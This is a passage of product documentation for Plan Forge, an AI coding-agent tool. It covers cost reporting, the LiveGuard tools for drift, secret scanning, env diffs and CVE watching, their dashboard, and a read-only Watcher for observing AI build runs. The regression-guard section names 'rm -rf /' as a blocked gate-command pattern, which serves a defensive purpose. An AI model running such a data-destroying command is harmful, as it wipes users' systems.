Skill / plan files are portable	SKILL.md and plan markdown are vendor-neutral text. Moving to a different agent runtime (Claude Code, Cursor, raw API scripts) preserves your investment.

Forecasting at scale

For teams or CI use, forge_cost_report aggregates roll up cleanly. Group by the dimension you want to forecast against and feed the result into your spreadsheet, BI tool, or dashboard of choice:

# Monthly spend by model
GET /api/cost/report?scope=month&groupBy=model

# Per-run breakdown (granular: every LLM call)
GET /api/cost/report?runId=run-2026-05-18-091234

# Last-30-day rollup by role (worker vs reviewer vs quorum vs forge-master)
GET /api/cost/report?scope=month&groupBy=role

Records come straight out of .forge/cost-history.json, one row per LLM call, with run id, slice, role, model, token counts, and dollar amount (or xAI ticks). The file is plain JSONL; you can pipe it through jq, import it into DuckDB, or load it into a spreadsheet without going through the API. Plan Forge does not enforce budgets, send alerts, or phone home with provider invoices; the data is yours, and the policy is yours.
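
If you read the file directly rather than calling the API, a rollup takes only a few lines. This is a sketch under assumptions: the record field names `model`, `role`, and `usd` are guesses for illustration, so check a real record before relying on them.

```javascript
// Sum dollar amounts per group from JSONL text (one JSON record per line).
// The field names `model`, `role`, and `usd` are assumptions for this sketch.
function rollup(jsonlText, groupBy) {
  const totals = {};
  for (const line of jsonlText.split("\n")) {
    if (line.trim() === "") continue; // tolerate blank and trailing lines
    const record = JSON.parse(line);
    const key = record[groupBy];
    totals[key] = (totals[key] ?? 0) + record.usd;
  }
  return totals;
}
```

In Node the input text would typically come from `fs.readFileSync(".forge/cost-history.json", "utf8")`; passing `"role"` instead of `"model"` as `groupBy` gives the worker / reviewer / quorum split.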

Worked example: a real slice

From the recent v3.6.2 manual-completion phase, slice B5 ("ship REST API reference appendix"):

Item	Value
Mode	`auto` quorum, 3 models on hardening, 1 model on execution
Files touched	10 (1 new, 9 modified)
Worker input tokens	~42,000 (system + scope + 9 referenced files at ~3K each)
Worker output tokens	~6,400 (mostly the new `rest-api-reference.html`)
Cache hit on system block	Yes (Anthropic, 0.10× on ~3,200 cached tokens)
Validation passes	2 (one failed on broken cross-refs, ~5K extra worker tokens to fix)
Total provider spend	~$0.78
Equivalent `power` mode estimate	~$6.20 (8× multiplier)
Equivalent `disabled` estimate	~$0.26 (single model, but expected reduction in reviewer-catch rate raised retry risk; auto was the right pick)

The lesson: auto mode with right-sized slices and tight gates kept a 600-line appendix delivery under a dollar. The estimator predicted $0.71; actual was $0.78, a 10% miss attributable to the second validation pass, which the estimator does not yet model.
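
The "10% miss" is measured relative to the estimate, not the actual. A tiny sketch of that arithmetic (the function name is hypothetical):

```javascript
// Relative miss of an estimate against the actual, as a percentage of the estimate.
function estimateMissPct(estimatedUsd, actualUsd) {
  return ((actualUsd - estimatedUsd) / estimatedUsd) * 100;
}

console.log(estimateMissPct(0.71, 0.78).toFixed(1)); // about 9.9, i.e. the "10% miss"
```

Tracking this number across runs is one way to see whether the estimator's blind spots, such as extra validation passes, matter for your plans.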

What Is LiveGuard?

The forge builds your software. LiveGuard watches the gates after it ships.

Four functional groups. LiveGuard ships as four bundles that compose into one defense posture: nine post-coding tools (drift, incidents, health DNA, secrets, regression, triage, journals, hotspots, snapshots); secret scanning and env diff; fix proposals, quorum analysis, and lifecycle hooks; composite health checks, auto-chaining, and incident auto-resolution.

The Problem LiveGuard Solves

Plan Forge sessions end when the code ships. The forge hardens your plan, executes your slices, and pushes a clean commit. Then it stops, because that's the right boundary for a build-time tool.

But software doesn't stop when the build does. Secrets drift into environment variables. Dependencies acquire CVEs. Configuration diverges between environments. The regression gate you wrote last month no longer covers the new payment flow. None of these are build-time failures; they're post-coding failures. And without a watch on the gates, they grow silently until they become incidents.

LiveGuard is what watches after the forge stops.

LiveGuard Intelligence

LiveGuard doesn't just observe, it learns. Every finding feeds back into the system:

Recurring Incident Detection: When the same files trigger incidents 3+ times in 30 days, LiveGuard auto-escalates the severity and marks the pattern as systemic.
Fix Proposal Outcome Tracking: When a regression guard passes after a fix proposal was generated, the proposal is marked as "effective." Over time, the system learns which fix patterns work.
Hotspot Test Priority: High-churn files (from forge_hotspot) are tested first by the regression guard. Risk-based testing: test the code most likely to break.
Project Health DNA: A composite fingerprint combining drift score, incident rate, test pass rate, model success rate, and cost per slice. Persisted to .forge/health-dna.json for cross-session decay detection.
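
The recurring-incident rule (same files, 3+ times in 30 days) can be sketched as a windowed count. The incident shape `{ files, timestamp }` is an assumption loosely based on the fields `forge_incident_capture` records; this is not LiveGuard's actual implementation.

```javascript
const DAY_MS = 24 * 60 * 60 * 1000;

// Return the files that appear in `minCount` or more incidents within the
// trailing window. Incident shape ({ files, timestamp }) is an assumption.
// `now` is a millisecond epoch timestamp.
function systemicFiles(incidents, now, windowDays = 30, minCount = 3) {
  const cutoff = now - windowDays * DAY_MS;
  const counts = new Map();
  for (const incident of incidents) {
    if (Date.parse(incident.timestamp) < cutoff) continue; // outside the window
    for (const file of new Set(incident.files)) {
      counts.set(file, (counts.get(file) ?? 0) + 1);
    }
  }
  return [...counts].filter(([, n]) => n >= minCount).map(([file]) => file);
}
```

Each file is counted once per incident, so a single incident that lists the same path twice does not inflate the total.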

The Lifecycle Position

LiveGuard occupies the operational phase, after code is shipped but before (and alongside) production APM:

Specify → Plan → Execute → Ship → 🛡️ LiveGuard Watches

The forge pipeline (Chapters 1–14) covers everything left of the final arrow. LiveGuard picks up to its right.

What LiveGuard Is Not

LiveGuard is not an APM (Application Performance Monitoring) system. It doesn't instrument your production runtime, collect request traces, or measure p99 latency. Tools like Datadog, New Relic, and Application Insights already do that well.

LiveGuard operates at the project level, not the request level. It watches your codebase, your environment files, your dependency tree, and your deployment history: the things that change between builds, not between HTTP requests. Think of it as a quality gate that stays active between coding sessions.

The Guardian Metaphor

In the forge metaphor, the build pipeline is the smith: it shapes raw material into a finished product. LiveGuard is the guardian posted at the gate after the smith finishes. The guardian doesn't shape the metal; it watches for cracks, drift, and intrusions that appear over time.

Each LiveGuard tool is a different kind of watch:

Drift watch: architecture diverging from the plan baseline (forge_drift_report)
Incident watch: production failures and MTTR tracking (forge_incident_capture)
Dependency watch: new CVEs in your dependency tree (forge_dep_watch)
Regression watch: validation gates that used to pass now fail (forge_regression_guard)
Churn watch: files that change too frequently signal instability (forge_hotspot)
Secret watch: high-entropy strings committed in diffs (forge_secret_scan)
Env watch: configuration key divergence across environments (forge_env_diff)

When to Run LiveGuard Tools

LiveGuard tools are designed for four trigger points:

When	Tools to Run	Why
After every plan execution	forge_drift_report, forge_regression_guard	Catch architecture drift while context is fresh
Before a deploy	forge_secret_scan, forge_env_diff, forge_dep_watch	Block secrets, missing env keys, and new CVEs from reaching production
On a schedule (daily / weekly)	forge_health_trend, forge_alert_triage, forge_hotspot	Trend analysis and prioritized alert review
After an incident	forge_incident_capture, forge_runbook	Record the incident and generate a response runbook

As of v2.29, lifecycle hooks automate this: PreDeploy runs secret scan and env diff automatically before any deploy command, and PostSlice runs drift analysis after every commit.

Next steps: See Chapter 17 — LiveGuard Tools Reference for every tool and its CLI flags. See Chapter 18 — The LiveGuard Dashboard to learn the real-time monitoring UI.

14 floating forge tools with colored auras arranged around a glowing amber anvil in a dark workshop

Act III, Guard with LiveGuard · Chapter 17

LiveGuard Tools Reference

14 post-coding intelligence tools. Each guards a different gate.

What LiveGuard is, and isn't.

LiveGuard is a build-time and pre/post-deploy guardrail layer. It runs in your CI / dev shell / dashboard. It looks at the codebase, the plan that built it, the dependencies, and the env config, before traffic ever sees the change.
LiveGuard is not an APM like Datadog, New Relic, or Sentry. It does not instrument running production traffic. It does not track per-request latency, error rates, or live user sessions. Use APMs for those things and run LiveGuard alongside them; the two layers complement each other.
The mental model: APMs answer “is the running app healthy right now?” LiveGuard answers “is what we just shipped safe to ship, and is the codebase staying within the architectural rules over time?”

v2.30.0, 14 tools shipped. Per-tool reference below includes CLI invocation, options, output shape, thresholds, and integration notes.

Tool Index

Figure 17-1. LiveGuard tools grouped by trigger window into 3 swimlanes. After Execution (amber, PostSlice hook) holds drift_report, regression_guard, runbook, and deploy_journal. Before Deploy (red, PreDeploy hook) holds secret_scan, env_diff, dep_watch, and liveguard_run, and blocks deploy on high-severity findings. On Schedule (purple, cron/watcher) holds health_trend, hotspot, incident_capture, and alert_triage. Each tool tile shows what it catches and how it's invoked.

All 14 LiveGuard tools are available as MCP tools and via REST API. Full reference per tool below.

Tool	What It Guards	Since
forge_drift_report	Architecture drift vs. plan	v2.27
forge_incident_capture	Incident log + MTTR tracking	v2.27
forge_dep_watch	Dependency vulnerability changes	v2.27
forge_regression_guard	Regression gate pass/fail history	v2.27
forge_runbook	Operational runbook store	v2.27
forge_hotspot	High-churn / high-failure files	v2.27
forge_health_trend	Long-term health + MTTBF trending	v2.27
forge_alert_triage	Ranked cross-signal alert list	v2.27
forge_deploy_journal	Deploy log with pre/post health	v2.27
forge_secret_scan	High-entropy secret detection in diffs	v2.28
forge_env_diff	Environment variable key divergence	v2.28
forge_fix_proposal	Scoped fix plan from regression/drift/incident/secret failure, human-approved only	v2.29
forge_quorum_analyze	Structured quorum prompt assembly from LiveGuard data, no LLM calls in server	v2.29
forge_liveguard_run	Composite health check, runs all LiveGuard tools in one call, returns unified green/yellow/red status	v2.30

All 14 LiveGuard tools ship in the default install.

forge_drift_report

Scores codebase against architecture guardrail rules from instruction files. Tracks drift over time in .forge/drift-history.json. Fires a bridge notification when the score drops below the configured threshold.

CLI

pforge drift [--since <ref>] [--threshold <score>]

Option	Default	Description
--since	HEAD~5	Git ref for comparison baseline
--threshold	70	Score below which a bridge notification fires

Output: { score, delta, violations[], timestamp }. Score is 0–100; higher is better. delta is the change since the previous run.

forge_incident_capture

Records incidents with severity, affected files, and MTTR tracking. Dispatches on-call notification via the .forge.json onCall config if present.

CLI

pforge incident "<description>" [--severity critical|high|medium|low] [--files f1,f2] [--resolved-at ISO]
pforge triage    # list ranked open alerts (incidents + drift violations)

Option	Default	Description
severity	medium	One of: critical, high, medium, low
files	[]	Affected file paths
description	—	Human-readable incident description

Output: { incidentId, severity, mttr, onCallNotified, storedAt }. Incidents are appended to .forge/incidents.jsonl (one JSON record per line).

forge_dep_watch

Scans dependencies for CVEs using npm audit. Compares against a previous snapshot in .forge/deps-snapshot.json. Alerts on new vulnerabilities only; unchanged findings are suppressed.

CLI

pforge dep-watch

Output: { newVulnerabilities[], resolvedVulnerabilities[], unchanged, snapshot }. Fires a dep-vulnerability hub event when new CVEs appear.
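
The "new only" behaviour amounts to a set difference between two snapshots. A minimal sketch, assuming each snapshot is an object keyed by advisory id (the real layout of `.forge/deps-snapshot.json` is not shown in this chapter and may differ):

```javascript
// Compare two audit snapshots keyed by advisory id. The snapshot shape
// ({ [id]: details }) is an assumption for this sketch.
function diffVulnerabilities(previous, current) {
  const before = new Set(Object.keys(previous));
  const after = new Set(Object.keys(current));
  const newVulnerabilities = [...after].filter((id) => !before.has(id));
  const resolvedVulnerabilities = [...before].filter((id) => !after.has(id));
  const unchanged = after.size - newVulnerabilities.length;
  return { newVulnerabilities, resolvedVulnerabilities, unchanged };
}
```

Only a non-empty `newVulnerabilities` list would warrant an alert; a finding that persists between runs lands in `unchanged` and stays quiet.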

forge_regression_guard

Extracts validation gate commands from plan files, executes them against the codebase, and reports pass/fail/blocked results. Used by the PostSlice hook and manually after refactors.

CLI

pforge regression-guard [--plan <plan-file>]

Option	Default	Description
--plan	all plans in docs/plans/	Specific plan file to check gates for

Output: { gates[], passed, failed, blocked, summary }. Commands are allow-listed via GATE_ALLOWED_PREFIXES; dangerous patterns like rm -rf / are blocked.
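
Prefix allow-listing combined with a deny pattern can be sketched as follows. The prefixes and the pattern here are hypothetical stand-ins; the actual contents of `GATE_ALLOWED_PREFIXES` are defined in the Plan Forge source and are not reproduced in this chapter.

```javascript
// Hypothetical prefixes and patterns, for illustration only.
const ALLOWED_PREFIXES = ["npm test", "npm run ", "dotnet test", "pytest"];
const BLOCKED_PATTERNS = [/\brm\s+-rf\s+\//];

// A gate command runs only if it starts with an allowed prefix and matches
// no blocked pattern; anything else is reported as "blocked".
function classifyGateCommand(command) {
  const trimmed = command.trim();
  const allowed = ALLOWED_PREFIXES.some((prefix) => trimmed.startsWith(prefix));
  const dangerous = BLOCKED_PATTERNS.some((pattern) => pattern.test(trimmed));
  return allowed && !dangerous ? "run" : "blocked";
}
```

Checking the deny pattern against the whole command, not just its start, catches a dangerous command chained after an allowed prefix.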

forge_runbook

Generates a human-readable operational runbook from a hardened plan file. Optionally appends recent incidents for context. Saves to .forge/runbooks/.

CLI

pforge runbook <plan-file>    # generate a runbook from a hardened plan

Naming: Plan filename → lowercase → non-[a-z0-9-] replaced with hyphens → collapse → append -runbook.md.
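
The naming pipeline translates directly into two regular-expression replacements. A sketch, with one caveat stated as an assumption: the rule does not say whether the plan's `.md` extension is stripped first, so this function applies the steps literally to whatever name it is given.

```javascript
// Apply the naming steps literally to the name passed in. Whether the plan's
// `.md` extension is stripped first is not stated, so pass the base name.
function runbookFileName(planName) {
  return (
    planName
      .toLowerCase()
      .replace(/[^a-z0-9-]/g, "-") // non-[a-z0-9-] becomes a hyphen
      .replace(/-+/g, "-") + // collapse runs of hyphens
    "-runbook.md"
  );
}
```

For example, `runbookFileName("Phase-07 Auth_Refactor")` yields `phase-07-auth-refactor-runbook.md`.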

forge_hotspot

Identifies git churn hotspots: the files that change most frequently. Uses a 24-hour cache to avoid repeated git log queries.

CLI

pforge hotspot [--top 10] [--since 30d]

Option	Default	Description
--top	10	Number of hotspot files to return
--since	30d	Time window for churn analysis

Output: { hotspots[{ file, changeCount, lastChanged }], since, cachedUntil }.
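
Churn counting itself is a frequency table over commit file lists. A sketch that produces entries in the `{ file, changeCount, lastChanged }` shape above; the input format (an array of `{ date, files }`) is an assumption standing in for parsed `git log` output, and the tie-break by file name is a choice made for this example.

```javascript
// Count how often each file appears across commits and return the top N.
// Input shape (an array of { date, files }) is an assumption; the real tool
// derives this from `git log`.
function topHotspots(commits, top = 10) {
  const stats = new Map();
  for (const { date, files } of commits) {
    for (const file of files) {
      const entry = stats.get(file) ?? { file, changeCount: 0, lastChanged: date };
      entry.changeCount += 1;
      if (date > entry.lastChanged) entry.lastChanged = date; // ISO dates sort as strings
      stats.set(file, entry);
    }
  }
  return [...stats.values()]
    .sort((a, b) => b.changeCount - a.changeCount || a.file.localeCompare(b.file))
    .slice(0, top);
}
```

The string comparison on dates only works when every date uses the same ISO 8601 format and time zone.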

forge_health_trend + Health DNA v2.32

Aggregates drift scores, cost history, incident frequency, model performance, and test pass rates over a configurable time window. Returns an overall health score 0–100 plus a Health DNA fingerprint for decay detection.

CLI

pforge health-trend [--window 30d]

Output: { healthScore, drift, cost, incidents, models, tests, healthDNA }.

Health DNA (.forge/health-dna.json): Composite fingerprint of driftAvg, incidentRate, testPassRate, modelSuccessRate, and costPerSlice. Compare across time to detect project decay before it manifests as bugs.

forge_alert_triage

Reads incidents and drift violations, ranks by priority (severity × recency), and returns a prioritized list. Read-only, never modifies data.

CLI

pforge alert-triage

Output: { alerts[{ source, severity, priority, description, timestamp }], totalAlerts }. Priority is a computed score; higher means "address first".
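
One way to picture "severity × recency" is a severity weight multiplied by an exponential decay on age. The weights and the 7-day half-life below are invented for illustration; the manual does not specify the actual formula.

```javascript
// Hypothetical weights and decay; the manual states only that priority is
// severity × recency and that a higher score means "address first".
const SEVERITY_WEIGHT = { critical: 4, high: 3, medium: 2, low: 1 };

// `now` is a millisecond epoch timestamp.
function priority(alert, now, halfLifeDays = 7) {
  const ageDays = (now - Date.parse(alert.timestamp)) / 86400000;
  const recency = Math.pow(0.5, ageDays / halfLifeDays); // 1.0 now, 0.5 after one half-life
  return SEVERITY_WEIGHT[alert.severity] * recency;
}

// Read-only ranking: returns new objects and leaves the input untouched.
function triage(alerts, now) {
  return alerts
    .map((alert) => ({ ...alert, priority: priority(alert, now) }))
    .sort((a, b) => b.priority - a.priority);
}
```

Under these made-up numbers, a week-old critical incident (4 × 0.5 = 2) ranks below a fresh high-severity one (3 × 1 = 3), which is the kind of trade-off a severity × recency score is meant to express.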

forge_deploy_journal

Records deployments with version, deployer, notes, and an optional slice reference. Correlates with forge_incident_capture so incidents can be linked to the deploy that introduced them.

CLI

pforge deploy-log [--tag <tag>] [--notes "..."]

Output: { deployId, version, deployer, timestamp, notes }. Stored in .forge/deploy-journal.jsonl.

forge_secret_scan v2.28

Scans git diff output for high-entropy strings using Shannon entropy analysis. Never logs actual secret values; all findings are masked to <REDACTED> in output, cache, and telemetry.

CLI

pforge secret-scan [--since HEAD~1] [--threshold 4.0]

Option	Default	Description
--since	HEAD~1	Git ref to diff against
--threshold	4.0	Shannon entropy threshold (higher = fewer but more confident findings)

Output:

{
  "scannedAt": "2026-04-13T...",
  "since": "HEAD~1",
  "threshold": 4.0,
  "scannedFiles": 5,
  "clean": false,
  "findings": [{
    "file": "src/config.js",
    "line": 5,
    "type": "api_key",
    "entropyScore": 4.8,
    "masked": "<REDACTED>",
    "confidence": "high"
  }]
}

Security: Cache file (.forge/secret-scan-cache.json) stores only file paths, line numbers, entropy scores, and <REDACTED> placeholders. If git is unavailable, the tool degrades gracefully with { clean: null, scannedFiles: 0 }. The tool may also annotate the .forge/deploy-journal-meta.json sidecar with scan results.
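
For readers unfamiliar with the metric, Shannon entropy in bits per character is H = -Σ p(c) · log2 p(c) over the characters of the string. A minimal sketch of the measure and a masked finding; how the real scanner tokenizes diffs, and whether it compares with ≥ or >, are not stated here, so `scanToken` is an assumption.

```javascript
// Shannon entropy in bits per character: H = -Σ p(c) · log2 p(c).
function shannonEntropy(text) {
  const counts = new Map();
  for (const ch of text) counts.set(ch, (counts.get(ch) ?? 0) + 1);
  const length = [...text].length;
  let entropy = 0;
  for (const count of counts.values()) {
    const p = count / length;
    entropy -= p * Math.log2(p);
  }
  return entropy;
}

// Flag a candidate string without ever echoing it back, mirroring the
// masking rule. Using >= for the comparison is an assumption.
function scanToken(token, threshold = 4.0) {
  const entropyScore = shannonEntropy(token);
  return entropyScore >= threshold ? { entropyScore, masked: "<REDACTED>" } : null;
}
```

A string of one repeated character scores 0, and a string of 32 distinct characters scores exactly 5, so the default threshold of 4.0 sits between ordinary identifiers and random-looking keys.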

forge_env_diff v2.28

Compares environment variable key names across .env files and identifies keys present in the baseline but missing in targets (and vice versa). It never logs, caches, or outputs environment variable values.

CLI

pforge env-diff [--baseline .env] [--files .env.staging,.env.production]

Option	Default	Description
--baseline	.env	The reference environment file
--files	.env.*	Comma-separated target files to compare

Output:

{
  "scannedAt": "2026-04-13T...",
  "baseline": ".env",
  "filesCompared": 2,
  "pairs": [{
    "file": ".env.staging",
    "missingInTarget": ["STRIPE_KEY"],
    "missingInBaseline": []
  }],
  "summary": { "clean": false, "totalGaps": 1, "baselineKeyCount": 12 }
}

Security: The cache file (.forge/env-diff-cache.json) stores key names only. Values are never retained: the parser extracts the key portion of each KEY=value line and discards the rest.
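
The key-only comparison can be sketched as follows. This is an illustrative approximation, not the tool's parser: the handling of comments and of an `export ` prefix is an assumption, and the function names are hypothetical. The result keys reuse the field names from the sample output above.

```python
def parse_keys(text):
    """Collect key names from KEY=value lines; the value part is discarded."""
    keys = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue  # skip blanks, comments, and lines without an assignment
        key = line.split("=", 1)[0].strip()
        if key.startswith("export "):  # assumed: tolerate shell-style exports
            key = key[len("export "):].strip()
        if key:
            keys.add(key)
    return keys


def diff_keys(baseline_text, target_text):
    """Compare key names only and report the gaps in both directions."""
    baseline, target = parse_keys(baseline_text), parse_keys(target_text)
    return {
        "missingInTarget": sorted(baseline - target),
        "missingInBaseline": sorted(target - baseline),
    }
```

Because only the text before the first `=` is kept, nothing derived from a value can reach the cache or the output.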

Related: See Appendix F — LiveGuard Alert Runbooks for how to respond when each tool fires an alert.

.forge.json Schema

LiveGuard tools read configuration from .forge.json at project root. Below are the root-level fields relevant to LiveGuard.

Field	Type	Description
bridge	object	Bridge configuration: `url` (string) and `approvalSecret` (string). Used for webhook notifications and approval gates.
model	string	Default AI model for plan execution (e.g., `"claude-sonnet-4.6"`).
onCall	object	On-call routing for incident notifications. `name` (string, required): person or team name. `channel` (string, required): notification channel ID or webhook. `escalation` (string, optional): escalation target if the primary is unavailable.
hooks	object	Lifecycle hook configuration: `preDeploy`, `postSlice`, `preAgentHandoff`. See v2.29 for details.
openclaw	object	OpenClaw analytics bridge: `endpoint` (string) and `apiKey` (string; see .forge/secrets.json).

Example .forge.json with LiveGuard fields:

{
  "bridge": { "url": "https://hooks.slack.com/...", "approvalSecret": "..." },
  "model": "claude-sonnet-4.6",
  "onCall": { "name": "Platform Team", "channel": "#incidents", "escalation": "eng-lead" },
  "hooks": {
    "preDeploy": { "enabled": true },
    "postSlice": { "enabled": true },
    "preAgentHandoff": { "enabled": true }
  },
  "openclaw": { "endpoint": "https://your-openclaw-instance" }
}

Validation: forge_smith checks onCall. If the field exists, it verifies that both name and channel are present and emits a warning (not an error) if either is missing.
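
The validation rule can be expressed as a small check. This is a sketch of the rule as stated, not forge_smith's code; the function name and the warning text are hypothetical.

```python
def check_on_call(config):
    """Return warnings for an incomplete onCall block; an absent onCall is fine."""
    on_call = config.get("onCall")
    if on_call is None:
        return []
    return [
        f"onCall.{field} is missing"
        for field in ("name", "channel")  # escalation is optional
        if not on_call.get(field)
    ]
```

Returning a list of warnings rather than raising matches the "warning, not an error" behavior: the caller can report the problems and continue.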

Forge control room with curved screens showing health gauges and holographic displays above an anvil console

Act III, Guard with LiveGuard · Chapter 18

The LiveGuard Dashboard

The same unified dashboard, extended with a LIVEGUARD section: 7 real-time tabs driven by WebSocket hub events.

Dashboard LiveGuard section. 7 tabs: Health, Incidents, Triage, Security, Env, Watcher, Bug Registry. Quorum Analysis links and Fix Proposals Feed are available. forge_liveguard_run composite results are displayed inline.

Opening the Dashboard

The LiveGuard section is part of the unified Plan Forge dashboard; no separate app or port is required:

Terminal

node pforge-mcp/server.mjs

Open localhost:3100/dashboard. The LIVEGUARD section appears in the tab bar after a visual divider, separated from the FORGE section.

Two Sections, One Dashboard

The tab bar uses a two-section layout:

FORGE: Progress, Runs, Cost, ···

LIVEGUARD: 🛡️ Health, Incidents, Triage, Security, Env, Watcher, Bug Registry

FORGE tabs use a blue active indicator and LIVEGUARD tabs use amber, so you always know which half of the dashboard you're in.

Health Tab

The Health tab shows aggregate project health powered by forge_health_trend. Key widgets:

Health Score: a single 0–100 number, color-coded green (80+), amber (50–79), or red (<50). Computed from drift, incidents, cost, and model performance.
Drift Trend: a 30-day line chart of architecture drift scores. The x-axis is time; the y-axis is the score (0–100).
MTTBF: Mean Time Between Failures, calculated from incident timestamps. Lower is worse.
Cost Trend: monthly aggregated cost from forge_cost_report.

The Health tab auto-refreshes on every liveguard-tool-completed WebSocket event. No manual refresh needed.
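
The score bands and the MTTBF definition above can be sketched in a few lines. This is an illustration only: the function names are hypothetical, and because the manual does not say how MTTBF is averaged, taking the mean of consecutive gaps is an assumption.

```python
from datetime import datetime


def score_band(score):
    """Map a 0-100 health score to the color bands listed for the Health tab."""
    if score >= 80:
        return "green"
    if score >= 50:
        return "amber"
    return "red"


def mttbf_hours(timestamps):
    """Mean gap, in hours, between consecutive incident timestamps (ISO 8601)."""
    times = sorted(datetime.fromisoformat(t) for t in timestamps)
    if len(times) < 2:
        return None  # not enough incidents to measure a gap
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return sum(gaps) / len(gaps) / 3600.0
```

Three incidents spaced 24 and 48 hours apart give a mean gap of 36 hours; a shrinking value means failures are arriving closer together.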

Incidents Tab

Live list of open incidents from .forge/incidents.jsonl. Each card shows:

Incident ID: unique identifier
Severity badge: color-coded red (critical), orange (high), yellow (medium), or grey (low)
MTTR: time elapsed since the incident was captured, updated in real time
On-call: engineer name from the .forge.json onCall config
Affected files: file list, clickable to view in the editor

Fix Proposals Feed: when forge_fix_proposal has generated plans, a Proposed Fixes section appears at the top of the Incidents tab. Each entry shows the proposal file path, the source type (regression/drift/incident/secret), and a Run in Assisted Mode → button that opens the Actions tab pre-filled with the plan path. The feed reads from GET /api/fix/proposals on tab load and on every fix-proposal-ready hub event.

Triage Tab

Displays the output of forge_alert_triage: a ranked list of all open alerts sorted by priority (severity × recency). Each row shows:

Source: the tool that generated the alert (drift, regression, dep-watch, etc.)
Severity: badge matching the severity matrix in Appendix F
Priority score: computed rank (higher = address first)
Description: one-line summary
Timestamp: when the alert was generated

Critical and high alerts show a red/amber left-border on their row. The tab badge shows the total number of unresolved critical+high alerts.

Security Tab

Surfaces results from forge_secret_scan. Shows:

Scan status: clean (green shield) or findings (red shield with count)
Findings list: file path, line number, type (api_key, token, etc.), entropy score, and confidence level. Values are never shown, only <REDACTED> placeholders.
Last scan time: read from the cache file
Run Scan button: triggers POST /api/secrets/scan

The Security tab reads from .forge/secret-scan-cache.json on load and refreshes on liveguard-tool-completed events where tool === "forge_secret_scan".

Env Tab

Key-by-key comparison of all .env.* files in the project root, powered by forge_env_diff.

Key matrix: rows are env keys, columns are files. Present keys show a ✓; missing keys show a ✗.
Gap count: total missing keys, highlighted in the tab badge
Values are never displayed: the Env tab shows key names only
Run Diff button: triggers POST /api/env/diff

The tab reads from .forge/env-diff-cache.json on load. Cache is refreshed when forge_env_diff completes.

Quorum Analysis from the Dashboard

The Health and Incidents tabs each include a Run Quorum Analysis → link. Clicking it calls GET /api/quorum/prompt?source=<tab-source>&goal=risk-assess and opens a pre-populated quorum prompt in the Actions tab, ready to copy into your AI client. No model calls happen from the dashboard; it only assembles the prompt for you.

Help Links from the Dashboard

Each LiveGuard tab header includes a Docs ↗ link. Clicking it opens this chapter in a new tab, so you never lose your live dashboard session. The section header also has a Docs link pointing to this page's overview.

Related: See Chapter 17 — LiveGuard Tools Reference for the CLI tools that power each widget. See Appendix F for how to respond to alerts.

Tall stone watchtower at dusk with amber lantern-eyes scanning a foggy valley dotted with distant forge fires, read-only observation of other projects' forge runs

Act III, Guard · Chapter 19

The Watcher

A second pair of eyes on a running forge. Read-only by design.

New here? Read this first. You kick off a long Plan Forge run, maybe an hour of work across 30 slices, and you want to watch it happen without distracting the AI that's doing the work. The Watcher is exactly that: open a second VS Code window, point it at the running project, and ask “how's it going?” The Watcher reads the live event stream and tells you. It cannot edit, commit, or change anything in the project being watched. That's a safety guarantee, not a feature gap.

Snapshot mode: instant point-in-time read. Free. “Slice 12 of 30, no errors, $4 spent so far.”
Analyze mode: same data but with an AI summary. Costs a few cents. “Run is healthy but Slice 8 retried twice on a flaky test; worth investigating.”
Live tail: short streaming window (default 60 seconds). Useful when you suspect something is hanging.

Read-only watcher. The Watcher runs in a separate VS Code Copilot session with Plan-Forge as the workspace and points at another project that's executing a plan. It cannot modify anything in the target; it only reads.

Why a Watcher?

When you execute a long plan (pforge run-plan), the executor session is focused on one thing: building the next slice. It's not a good place to also answer "how's it going?" for a second human, or to notice anomaly patterns across multiple runs. The Watcher is the operational counterpart: it tails the run, reads event streams, and summarizes state.

Two-session topology: Session 1 (Build/Target) runs pforge run-plan in a VS Code window, with its own WebSocket hub on port 3101 and append-only files in .forge/runs/. Session 2 (Watcher) runs in a second VS Code window with its own working directory and uses forge_watch (snapshot, file reads only, $0) and forge_watch_live (bounded window WebSocket subscription with polling fallback). Watcher writes only to its own .forge/watch-history.jsonl, never to the target. The watcher's input schema exposes no write paths to the target. — Figure 19-1. Two-session topology

Two modes, one tool:

Snapshot (forge_watch): file reads only, zero AI cost. Returns slice counts, token usage, gate errors, and anomalies.
Analyze (forge_watch with mode=analyze): invokes a frontier model (default claude-opus-4.7) to produce narrative advice from the snapshot.

Live Tail — `forge_watch_live`

For near-live observation, forge_watch_live tails the event stream for a bounded window:

WebSocket mode: connects to the target's hub if it is running (see .forge/server-ports.json).
Polling fallback: tails events.log when the hub isn't up.
Default window: 60 seconds. Range: 1 s – 1 hr.
Captures up to 500 events in the response payload.

Figure 19-2. Snapshot vs Live Tail comparison table

Aspect	Snapshot	Live Tail
Data source	File reads	WebSocket / log tail
Cost	$0 always	$0 baseline + frontier model in analyze mode
Window	Point-in-time	Bounded durationMs (default 60 s)
Returns	Counts, anomalies, advice, cursor	Event stream (up to 500 events)
Best for	Spot checks	Live debugging
History	watch-history.jsonl	Cursor chaining

Typical usage from the Watcher session

forge_watch {
  targetPath: "E:/GitHub/Rummag",
  mode: "snapshot"
}

forge_watch_live {
  targetPath: "E:/GitHub/Rummag",
  durationMs: 30000
}

Anomaly Rules

The snapshot watcher runs heuristic rules over the run state and surfaces anomalies automatically. Examples:

review-queue-backlog: independent reviewer slices piling up.
tempering-run-failed: a Tempering run returned non-zero.
mutationBelowMinimum / flakyCount / perfRegressionCount: Tempering quality thresholds breached.
Crucible funnel stalls: ideas stuck in Crystallized with no hardener handoff.

Anomalies are emitted as watch-anomaly-detected hub events and appear in the dashboard's Watcher tab.

Distributed teams or remote runs? The Watcher only observes what's on the same machine. To watch a forge running on another host, or to forward anomalies to phones, Slack, or Discord, pair it with the companion Chapter 20 — The Remote Bridge.

Watch History

When recordHistory=true (the default in v2.35+), each snapshot is appended to the Watcher session's own .forge/watch-history.jsonl, never the target's. Pair with sinceTimestamp (pass the previous report's cursor) for gap-free continuous monitoring across multiple invocations.

Dashboard Watcher Tab

The dashboard's Watcher tab consumes two event types:

watch-snapshot-completed: emitted when forge_watch builds a snapshot.
watch-anomaly-detected: emitted when one or more anomaly rules fire.

Chip rows surface Tempering state, Crucible funnel state, and a Home chip showing in-flight runs / open incidents / open bugs, all without touching the target project.

Security Model

Read-only by contract. The Watcher's input schema exposes no write paths. It reads .forge/runs/<runId>/ and emits events to its own hub. History writes go only to the Watcher's cwd. Verified by the read-only subscriber test in pforge-mcp/tests/.

Pairing the Watcher With the Remote Bridge

